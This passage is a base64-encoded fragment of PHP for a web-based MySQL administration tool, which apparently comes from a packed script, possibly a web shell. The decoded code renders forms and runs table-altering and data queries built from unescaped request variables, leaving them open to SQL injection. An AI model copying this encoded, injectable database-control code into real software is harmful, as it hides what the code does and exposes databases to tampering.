m5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllCTE9CIiAnOyBpZiggJHR5cGUgPT0gInRpbnlibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5USU5ZQkxPQiAoMCB+IDI1NSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iQkxPQiIgJzsgaWYoICR0eXBlID09ICJibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CTE9CICgwIH4gNjU1MzUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9Ik1FRElVTUJMT0IiICc7IGlmKCAkdHlwZSA9PSAibWVkaXVtYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNQkxPQiAoMCB+IDE2Nzc3MjE1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJMT05HQkxPQiIgJzsgaWYoICR0eXBlID09ICJsb25nYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TE9OR0JMT0IgKDAgfiA0Mjk0OTY3Mjk1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJFTlVNIiAnOyBpZiggJHR5cGUgPT0gImVudW0iICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkVOVU08L3RkPg0KPHRkIGNvbHNwYW49NT48Y2VudGVyPnZhbHVlIGxpc3Q8L2NlbnRlcj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlNFVCIgJzsgaWYoICR0eXBlID09ICJzZXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNFVDwvdGQ+DQo8dGQgY29sc3Bhbj01PjxjZW50ZXI+dmFsdWUgbGlzdDwvY2VudGVyPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjx0YWJsZT4NCjx0cj48dGg+TTwvdGg+PHRoPkQ8L3RoPjx0aD51bnNpZ25lZDwvdGg+PHRoPnplcm9maWxsPC90aD48dGg+YmluYXJ5PC90aD48dGg+dmFsdWUgbGlzdCAoZXg6IFwnYXBwbGVcJywgXCdvcmFuZ2VcJywgXCdiYW5hbmFcJykgPC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPU0gJzsgaWYoICRNICE9ICIiICkgZWNobyAidmFsdWU9JE0iO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPUQgJzsgaWYoICREICE9ICIiICkgZWNobyAidmFsdWU9JEQiO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPXVuc2lnbmVkIHZhbHVlPSJVTlNJR05FRCIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgInVuc2lnbmVkIiApICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9emVyb2ZpbGwgdmFsdWU9IlpFUk9GSUxMIiAnOyBpZiggc3RycG9zKCAkZmllbGR0eXBlLCAiemVyb2ZpbGwiICkgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1iaW5hcnkgdmFsdWU9IkJJTkFSWSIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgImJpbmFyeSIgKSAgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBzaXplPTYwIG5hbWU9dmFsdWVsaXN0ICc7IGlmKCAkdmFsdWVsaXN0ICE9ICIiICkgZWNobyAidmFsdWU9XCIkdmFsdWVsaXN0XCIiO2VjaG8gJz48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8aDM+RmxhZ3M8L2gzPg0KPHRhYmxlPg0KPHRyPjx0aD5ub3QgbnVsbDwvdGg+PHRoPmRlZmF1bHQgdmFsdWU8L3RoPjx0aD5hdXRvIGluY3JlbWVudDwvdGg+PHRoPnByaW1hcnkga2V5PC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPW5vdF9udWxsIHZhbHVlPSJOT1QgTlVMTCIgJzsgaWYoICRmaWVsZG51bGwgIT0gIllFUyIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWRlZmF1bHRfdmFsdWUgJzsgaWYoICRmaWVsZGRlZmF1bHQgIT0gIiIgKSBlY2hvICJ2YWx1ZT0kZmllbGRkZWZhdWx0IjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1hdXRvX2luY3JlbWVudCB2YWx1ZT0iQVVUT19JTkNSRU1FTlQiICc7IGlmKCAkZmllbGRleHRyYSA9PSAiYXV0b19pbmNyZW1lbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9cHJpbWFyeV9rZXkgdmFsdWU9IlBSSU1BUlkgS0VZIiAnOyBpZiggJGZpZWxka2V5ID09ICJQUkkiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxwPic7DQoJaWYoICRjbWQgPT0gImFkZCIgKQ0KCQllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0FkZCBGaWVsZCc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IEZpZWxkJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9YnV0dG9uIHZhbHVlPUNhbmNlbCBvbkNsaWNrPSdoaXN0b3J5LmJhY2soKSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZUZpZWxkX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkb2xkX25hbWUsICRuYW1lLCAkdHlwZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2csDQoJCSRNLCAkRCwgJHVuc2lnbmVkLCAkemVyb2ZpbGwsICRiaW5hcnksICRub3RfbnVsbCwgJGRlZmF1bHRfdmFsdWUsICRhdXRvX2luY3JlbWVudCwgJHByaW1hcnlfa2V5LCAkdmFsdWVsaXN0Ow0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREICRuYW1lICI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKQ0KCQkkcXVlcnlTdHIgPSAiQUxURVIgVEFCTEUgJHRhYmxlbmFtZSBDSEFOR0UgJG9sZF9uYW1lICRuYW1lICI7DQoJaWYoICRNICE9ICIiICkNCgkJaWYoICREICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0sJEQpICI7DQoJCWVsc2UNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0pICI7DQoJZWxzZSBpZiggJHZhbHVlbGlzdCAhPSAiIiApIHsNCgkJJHZhbHVlbGlzdCA9IHN0cmlwc2xhc2hlcyggJHZhbHVlbGlzdCApOw0KCQkkcXVlcnlTdHIgLj0gIiR0eXBlKCR2YWx1ZWxpc3QpICI7DQoJfSBlbHNlDQoJCSRxdWVyeVN0ciAuPSAiJHR5cGUgIjsNCgkkcXVlcnlTdHIgLj0gIiR1bnNpZ25lZCAkemVyb2ZpbGwgJGJpbmFyeSAiOw0KCWlmKCAkZGVmYXVsdF92YWx1ZSAhPSAiIiApDQoJCSRxdWVyeVN0ciAuPSAiREVGQVVMVCAnJGRlZmF1bHRfdmFsdWUnICI7DQoJJHF1ZXJ5U3RyIC49ICIkbm90X251bGwgJGF1dG9faW5jcmVtZW50IjsNCglteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCS8vIGtleSBjaGFuZ2UNCgkka2V5Q2hhbmdlID0gZmFsc2U7DQoJJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAiU0hPVyBLRVlTIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkcHJpbWFyeSA9ICIiOw0KCXdoaWxlKCAkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCkgKQ0KCQlpZiggJHJvd1siS2V5X25hbWUiXSA9PSAiUFJJTUFSWSIgKSB7DQoJCQlpZiggJHJvd1tDb2x1bW5fbmFtZV0gPT0gJG5hbWUgKQ0KCQkJCSRrZXlDaGFuZ2UgPSB0cnVlOw0KCQkJZWxzZQ0KCQkJCSRwcmltYXJ5IC49ICIsICRyb3dbQ29sdW1uX25hbWVdIjsNCgkJfQ0KCWlmKCAkcHJpbWFyeV9rZXkgPT0gIlBSSU1BUlkgS0VZIiApIHsNCgkJJHByaW1hcnkgLj0gIiwgJG5hbWUiOw0KCQkka2V5Q2hhbmdlID0gISRrZXlDaGFuZ2U7DQoJfQ0KCSRwcmltYXJ5ID0gc3Vic3RyKCAkcHJpbWFyeSwgMiApOw0KCWlmKCAka2V5Q2hhbmdlID09IHRydWUgKSB7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBQUklNQVJZIEtFWSI7DQoJCW15c3FsX3F1ZXJ5KCAkcSApOw0KCQkkcXVlcnlTdHIgLj0gIjxicj5cbiIgLiAkcTsNCgkJJGVyck1zZyAuPSAiPGJyPlxuIiAuIG15c3FsX2Vycm9yKCk7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREIFBSSU1BUlkgS0VZKCAkcHJpbWFyeSApIjsNCgkJbXlzcWxfcXVlcnkoICRxICk7DQoJCSRxdWVyeVN0ciAuPSAiPGJyPlxuIiAuICRxOw0KCQkkZXJyTXNnIC49ICI8YnI+XG4iIC4gbXlzcWxfZXJyb3IoKTsNCgl9DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRmllbGQoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBDT0xVTU4gJGZpZWxkbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiB2aWV3RGF0YSggJHF1ZXJ5U3RyICkgew0KCWdsb2JhbCAkYWN0aW9uLCAkbXlzcWxIYW5kbGUsICRkYm5hbWUsICR0YWJsZW5hbWUsICRQSFBfU0VMRiwgJGVyck1zZywgJHBhZ2UsICRyb3dwZXJwYWdlLCAkb3JkZXJieTsNCgllY2hvICI8aDE+RGF0YSBpbiBUYWJsZTwvaDE+XG4iOw0KCWlmKCAkdGFibGVuYW1lICE9ICIiICkNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZSAmZ3Q7ICR0YWJsZW5hbWU8L3A+XG4iOw0KCWVsc2UNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJJHF1ZXJ5U3RyID0gc3RyaXBzbGFzaGVzKCAkcXVlcnlTdHIgKTsNCglpZiggJHF1ZXJ5U3RyID09ICIiICkgew0KCQkkcXVlcnlTdHIgPSAiU0VMRUNUICogRlJPTSAkdGFibGVuYW1lIjsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiIE9SREVSIEJZICRvcmRlcmJ5IjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1hZGREYXRhJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRGF0YTwvYT4gfCBcbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgl9DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgJHF1ZXJ5U3RyICk7DQoJJGZpZWxkdCA9IG15c3FsX2ZldGNoX2ZpZWxkKCRwUmVzdWx0KTsNCgkkdGFibGVuYW1lID0gJGZpZWxkdC0+dGFibGU7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJJEdMT0JBTFNbcXVlcnlTdHJdID0gJHF1ZXJ5U3RyOw0KCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJCXJldHVybjsNCgl9DQoJaWYoICRwUmVzdWx0ID09IDEgKSB7DQoJCSRlcnJNc2cgPSAiU3VjY2VzcyI7DQoJCWVjaG9RdWVyeVJlc3VsdCgpOw0KCQlyZXR1cm47DQoJfQ0KCWVjaG8gIjxocj5cbiI7DQoJJHJvdyA9IG15c3FsX251bV9yb3dzKCAkcFJlc3VsdCApOw0KCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCWlmKCAkcm93ID09IDAgKSB7DQoJCWVjaG8gIk5vIERhdGEgRXhpc3QhIjsNCgkJcmV0dXJuOw0KCX0NCglpZiggJHJvd3BlcnBhZ2UgPT0gIiIgKSAkcm93cGVycGFnZSA9IDMwOw0KCWlmKCAkcGFnZSA9PSAiIiApICRwYWdlID0gMDsNCgllbHNlICRwYWdlLS07DQoJbXlzcWxfZGF0YV9zZWVrKCAkcFJlc3VsdCwgJHBhZ2UgKiAkcm93cGVycGFnZSApOw0KCWVjaG8gIjx0YWJsZSBjZWxsc3BhY2luZz0xIGNlbGxwYWRkaW5nPTI+XG4iOw0KCWVjaG8gIjx0cj5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQllY2hvICI8dGg+IjsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJm9yZGVyYnk9Ii4kZmllbGQtPm5hbWUuIic+Ii4kZmllbGQtPm5hbWUuIjwvYT5cbiI7DQoJCWVsc2UNCgkJCWVjaG8gJGZpZWxkLT5uYW1lLiJcbiI7DQoJCWVjaG8gIjwvdGg+XG4iOw0KCX0NCgllY2hvICI8dGggY29sc3Bhbj0yPkFjdGlvbjwvdGg+XG4iOw0KCWVjaG8gIjwvdHI+XG4iOw0KCWZvciggJGkgPSAwOyAkaSA8ICRyb3dwZXJwYWdlOyAkaSsrICkgew0KCQkkcm93QXJyYXkgPSBteXNxbF9mZXRjaF9yb3coICRwUmVzdWx0ICk7DQoJCWlmKCAkcm93QXJyYXkgPT0gZmFsc2UgKSBicmVhazsNCgkJZWNobyAiPHRyPlxuIjsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRqID0gMDsgJGogPCAkY29sOyAkaisrICkgew0KCQkJJGRhdGEgPSAkcm93QXJyYXlbJGpdOw0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaiApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJJGtleSAuPSAiJiIgLiAkZmllbGQtPm5hbWUgLiAiPSIgLiAkZGF0YTsNCgkJCWlmKCBzdHJsZW4oICRkYXRhICkgPiAzMCApDQoJCQkJJGRhdGEgPSBzdWJzdHIoICRkYXRhLCAwLCAzMCApIC4gIi4uLiI7DQoJCQkkZGF0YSA9IGh0bWxzcGVjaWFsY2hhcnMoICRkYXRhICk7DQoJCQllY2hvICI8dGQ+XG4iOw0KCQkJZWNobyAiJGRhdGFcbiI7DQoJCQllY2hvICI8L3RkPlxuIjsNCgkJfQ0KCQlpZiggJGtleSA9PSAiIiApDQoJCQllY2hvICI8dGQgY29sc3Bhbj0yPm5vIEtleTwvdGQ+XG4iOw0KCQllbHNlIHsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWVkaXREYXRhJGtleSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+RWRpdDwvYT48L3RkPlxuIjsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWRlbGV0ZURhdGEka2V5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0RlbGV0ZSBSb3c/JylcIj5EZWxldGU8L2E+PC90ZD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+XG4iOw0KCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlxuIjsNCglpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWxzZQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249cXVlcnkmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcXVlcnlTdHI9JHF1ZXJ5U3RyJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWNobyAoJHBhZ2UrMSkuIi8iLihpbnQpKCRyb3cvJHJvd3BlcnBhZ2UrMSkuIiBwYWdlIjsNCgllY2hvICI8L2ZvbnQ+XG4iOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRwYWdlID4gMCApIHsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnBhZ2U9Ii4oJHBhZ2UpOw0KCQllbHNlDQoJCQllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXF1ZXJ5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnF1ZXJ5U3RyPSRxdWVyeVN0ciZwYWdlPSIuKCRwYWdlKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+UHJldjwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlByZXY8L2ZvbnQ+IjsNCgllY2hvICIgfCAiOw0KCWlmKCAkcGFnZSA8ICgkcm93LyRyb3dwZXJwYWdlKS0xICkgew0KCQlpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kbWxsZDBSaGRHRT0mZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcGFnZT0iLigkcGFnZSsyKTsNCgkJZWxzZQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1xdWVyeSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSZxdWVyeVN0cj0kcXVlcnlTdHImcGFnZT0iLigkcGFnZSsyKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+TmV4dDwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIk5leHQiOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRyb3cgPiAkcm93cGVycGFnZSApIHsNCgkJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBzaXplPTQgbmFtZT1wYWdlPlxuIjsNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdHbyc+XG4iOw0KCX0NCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjwvZm9udD5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZURhdGEoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBEYXRhPC9oMT5cbiI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKSB7DQoJCWVjaG8gIjxoMT5FZGl0IERhdGE8L2gxPlxuIjsNCgkJJHBSZXN1bHQgPSBteXNxbF9saXN0X2ZpZWxkcyggJGRibmFtZSwgJHRhYmxlbmFtZSApOw0KCQkkbnVtID0gbXlzcWxfbnVtX2ZpZWxkcyggJHBSZXN1bHQgKTsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRpID0gMDsgJGkgPCAkbnVtOyAkaSsrICkgew0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkNCgkJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSIgLiAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIiBBTkQgIjsNCgkJCQllbHNlDQoJCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0nIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJyBBTkQgIjsNCgkJfQ0KCQkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCQlteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCQkkcFJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgPSAgIlNFTEVDVCAqIEZST00gJHRhYmxlbmFtZSBXSEVSRSAka2V5IiwgJG15c3FsSGFuZGxlICk7DQoJCSRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJfQ0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRicgbWV0aG9kPXBvc3Q+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWFkZERhdGFfc3VibWl0PlxuIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1lZGl0RGF0YV9zdWJtaXQ+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10YWJsZW5hbWUgdmFsdWU9JHRhYmxlbmFtZT5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9Mj5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+TmFtZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5UeXBlPC90aD5cbiI7DQoJZWNobyAiPHRoPkZ1bmN0aW9uPC90aD5cbiI7DQoJZWNobyAiPHRoPkRhdGE8L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCgkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBSZXN1bHQgKTsNCgkkcFJlc3VsdExlbiA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJCSRmaWVsZG5hbWUgPSAkZmllbGRbIkZpZWxkIl07DQoJCSRmaWVsZHR5cGUgPSAkZmllbGRbIlR5cGUiXTsNCgkJJGxlbiA9IG15c3FsX2ZpZWxkX2xlbiggJHBSZXN1bHRMZW4sICRpICk7DQoJCWVjaG8gIjx0cj4iOw0KCQllY2hvICI8dGQ+JGZpZWxkbmFtZTwvdGQ+IjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJUeXBlIl0uIjwvdGQ+IjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiPHNlbGVjdCBuYW1lPSR7ZmllbGRuYW1lfV9mdW5jdGlvbj5cbiI7DQoJCWVjaG8gIjxvcHRpb24+XG4iOw0KCQllY2hvICI8b3B0aW9uPkFTQ0lJXG4iOw0KCQllY2hvICI8b3B0aW9uPkNIQVJcbiI7DQoJCWVjaG8gIjxvcHRpb24+U09VTkRFWFxuIjsNCgkJZWNobyAiPG9wdGlvbj5DVVJEQVRFXG4iOw0KCQllY2hvICI8b3B0aW9uPkNVUlRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+RlJPTV9EQVlTXG4iOw0KCQllY2hvICI8b3B0aW9uPkZST01fVU5JWFRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+Tk9XXG4iOw0KCQllY2hvICI8b3B0aW9uPlBBU1NXT1JEXG4iOw0KCQllY2hvICI8b3B0aW9uPlBFUklPRF9BRERcbiI7DQoJCWVjaG8gIjxvcHRpb24+UEVSSU9EX0RJRkZcbiI7DQoJCWVjaG8gIjxvcHRpb24+VE9fREFZU1xuIjsNCgkJZWNobyAiPG9wdGlvbj5VU0VSXG4iOw0KCQllY2hvICI8b3B0aW9uPldFRUtEQVlcb